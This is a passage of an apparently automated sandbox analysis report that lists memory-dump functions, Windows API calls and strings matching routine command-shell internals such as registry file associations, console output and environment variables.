                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$BufferConsoleInfoScreen
                                    • String ID:
                                    • API String ID: 1034426908-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011DBF80
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011DBFC6
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DBFE1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DBFF2
                                      • Part of subcall function 011E29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(011E0B22,011E0B22,00007FE7), ref: 011E29E9
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC00E
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0C0
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC0CA
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0E5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011EA502
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                    • String ID:
                                    • API String ID: 402963468-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,011F3B43,?,?,?,011F977C), ref: 011F398D
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39A9
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,?,?,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F39BA
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39C3
                                    • memcmp.MSVCRT ref: 011F3A02
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,01217F20,?,?,?,011F3B43,?,?,?,011F977C), ref: 011F3A93
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3ABE
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3ACB
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD621,00000001,011F977C,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3AE0
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3AED
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                    • String ID:
                                    • API String ID: 2002953238-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                    • API String ID: 2081463915-1668778490
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011DD9BE
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _get_osfhandle.MSVCRT ref: 011DDAA6
                                    • _get_osfhandle.MSVCRT ref: 011DDAB7
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DDB53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _get_osfhandlememset
                                    • String ID: DPATH
                                    • API String ID: 3784859044-2010427443
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 011F5AEF
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 011F5B7B
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5BA2
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,00000000,00000002,?,00000000), ref: 011F5C13
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 011F5C4F
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5C71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseValue$CreateDeleteOpen
                                    • String ID: %s=%s$\Shell\Open\Command
                                    • API String ID: 4081037667-3301834661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • towupper.MSVCRT ref: 011F6B89
                                    • iswalpha.MSVCRT ref: 011F6BBC
                                    • towupper.MSVCRT ref: 011F6BCF
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 011F6C01
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C16
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                    • String ID: :\$%04X-%04X
                                    • API String ID: 4001382275-3541097225
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58AF
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0), ref: 011F58E5
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F58F3
                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5930
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F594D
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F5974
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,011FC0E0,00000018,011F4B14,00000000,00000003), ref: 011F598F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseDeleteValue$CreateOpen
                                    • String ID: %s=%s
                                    • API String ID: 1019019434-1087296587
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 011F5414
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 011F5429
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 011F5487
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 011F54D3
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 011F54FA
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 011F5531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                    • API String ID: 1580871199-2613899276
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011D5E10
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 011D5E43
                                    • _open_osfhandle.MSVCRT ref: 011D5E57
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011E9D2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 689241570-4257191772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 011F5584
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 011F55BE
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 011F5601
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F5608
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 011F563A
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F5641
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 011F5648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                    • String ID: PE
                                    • API String ID: 3093239467-4258593460
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F850D
                                    • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 011F8515
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011F855B
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 011F8563
                                    • _get_osfhandle.MSVCRT ref: 011F8575
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 011F857D
                                    • memcmp.MSVCRT ref: 011F859F
                                    • _get_osfhandle.MSVCRT ref: 011F85D0
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011F85D8
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                    • String ID:
                                    • API String ID: 332413853-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011D8254
                                    • memset.MSVCRT ref: 011D8280
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83BB
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset
                                    • String ID: %s
                                    • API String ID: 2221118986-3043279178
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _wcsnicmp.MSVCRT ref: 011D91B7
                                    • wcstol.MSVCRT ref: 011D91FC
                                    • wcstol.MSVCRT ref: 011D928A
                                    • longjmp.MSVCRT(?,000000FF,8C8BFE4F,-00000002,?,00000000), ref: 011F08B2
                                    • longjmp.MSVCRT(?,000000FF), ref: 011F08C6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                    • String ID:
                                    • API String ID: 2863075230-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E501F
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • memset.MSVCRT ref: 011E5098
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50A7
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50E1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E516F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E517D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$EnvironmentVariable
                                    • String ID: DIRCMD
                                    • API String ID: 1405722092-1465291664
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 011F1A4D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F1A5F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 011F1A68
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorLast$CloseCreateHandleSemaphore
                                    • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                    • API String ID: 2276426104-46676964
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$iswdigit
                                    • String ID: +-~!$<>+-*/%()|^&=,
                                    • API String ID: 2770779731-632268628
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011E987D
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9885
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,00000000,011E65F0,?,011E64F0), ref: 011E98C4
                                    • _get_osfhandle.MSVCRT ref: 011E98DD
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E64F0,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E98E5
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9968
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                    • String ID:
                                    • API String ID: 1333215474-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011DC9CF
                                    • _wcsicmp.MSVCRT ref: 011DC9E5
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                    • String ID:
                                    • API String ID: 2943530692-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011E5EE4
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$iswspace
                                    • String ID:
                                    • API String ID: 3458554142-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4D3E
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 011F4E9A
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 011F4F8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Enum$Open
                                    • String ID: %s=%s$.$\Shell\Open\Command
                                    • API String ID: 2886760741-1459555574
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011DB42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 011DB448
                                      • Part of subcall function 011DB42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 011DB460
                                      • Part of subcall function 011DB42E: NtClose.NTDLL(00000000), ref: 011DB4B1
                                    • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 011DB3A5
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 011DB3D3
                                    • RtlNtStatusToDosError.NTDLL ref: 011F133F
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1346
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 011F13B6
                                    • wcsstr.MSVCRT ref: 011F13D1
                                    • wcsstr.MSVCRT ref: 011F13EF
                                      • Part of subcall function 011DB3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,011F95EF,011E9564,00000001,?), ref: 011DB421
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                    • String ID:
                                    • API String ID: 1313749407-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011DEC37
                                    • wcschr.MSVCRT ref: 011DEC4F
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000000,?,011DED9F,?,00000000,?), ref: 011EC024
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC036
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,?), ref: 011EC049
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC05B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                    • String ID:
                                    • API String ID: 2511250921-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011F9427
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F954E
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 011F9480
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 011F9490
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 011F950B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9516
